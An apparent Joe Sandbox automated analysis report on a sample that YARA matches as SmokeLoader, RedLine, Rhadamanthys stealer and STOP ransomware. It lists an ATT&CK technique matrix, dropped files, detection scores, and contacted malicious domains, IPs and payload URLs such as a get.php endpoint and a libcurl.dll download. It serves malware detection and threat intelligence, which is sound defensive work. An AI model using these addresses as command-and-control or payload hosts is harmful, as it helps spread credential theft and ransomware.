Source: Yara match	File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	612 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	31 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	22 Software Packing	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	25 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	25 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\beirutt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4434343.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C676.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C4AA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\43D0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\43D0.exe	67%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Temp\4434343.dll	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\C4AA.exe	43%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\C676.exe	81%	ReversingLabs	Win32.Trojan.RedLine

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.3.C4AA.exe.df30000.1.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
6.2.C676.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1213203	Download File
9.3.C4AA.exe.df30000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
9.2.C4AA.exe.2d80000.2.unpack	100%	Avira	HEUR/AGEN.1228718	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.file.exe.5c0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.ngentask.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
10.2.43D0.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
0.3.file.exe.5d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
potunulit.org	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://potunulit.org/	0%	URL Reputation	safe
http://potunulit.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Responsel	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Responsel	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://golilopaster.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14Responsel	0%	URL Reputation	safe
http://bulimu55t.net/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://ryjphgb.com/pace	0%	Avira URL Cloud	safe
http://fedface.com/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id18Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Responsel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Responsel	0%	URL Reputation	safe
http://ryjphgb.com/	0%	Avira URL Cloud	safe
http://potunulit.org:80/N	100%	Avira URL Cloud	malware
http://potunulit.org/J2v-m	100%	Avira URL Cloud	malware
http://109.206.243.168/upload/libcurl.dllw	0%	Avira URL Cloud	safe
http://fedface.com/	0%	Virustotal		Browse
http://aygtqn.org/tem/W	0%	Avira URL Cloud	safe
http://drampik.com/lancer/get.php	100%	Avira URL Cloud	malware
http://egqgnqk.org/	0%	Avira URL Cloud	safe
http://egqgnqk.org/s	0%	Avira URL Cloud	safe
89.208.103.88:37538	0%	Avira URL Cloud	safe
http://109.206.243.168/upload/libcurl.dll	0%	Avira URL Cloud	safe
http://potunulit.org/s	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
potunulit.org	188.114.96.3	true	true	11%, Virustotal, Browse	unknown
api.2ip.ua	162.0.217.254	true	false		high
gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://potunulit.org/	true	URL Reputation: safe URL Reputation: safe	unknown
http://novanosa5org.org/	true	URL Reputation: safe URL Reputation: safe	unknown
http://golilopaster.org/	true	URL Reputation: safe	unknown
http://bulimu55t.net/	true	URL Reputation: safe	unknown
http://drampik.com/lancer/get.php	true	Avira URL Cloud: malware	unknown
89.208.103.88:37538	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ryjphgb.com/pace	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fedface.com/	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://potunulit.org/J2v-m	explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id14Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	C4AA.exe, 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://109.206.243.168/upload/libcurl.dllw	fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ryjphgb.com/	explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Response	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://potunulit.org:80/N	explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aygtqn.org/tem/W	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://egqgnqk.org/	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id3Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://egqgnqk.org/s	explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id17Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://109.206.243.168/upload/libcurl.dll	fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://potunulit.org/s	explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Responsel	ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	potunulit.org	European Union	13335	CLOUDFLARENETUS	true
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
89.208.103.88	unknown	Russian Federation	42569	PSKSET-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791287
Start date and time:	2023-01-25 09:26:11 +01:00
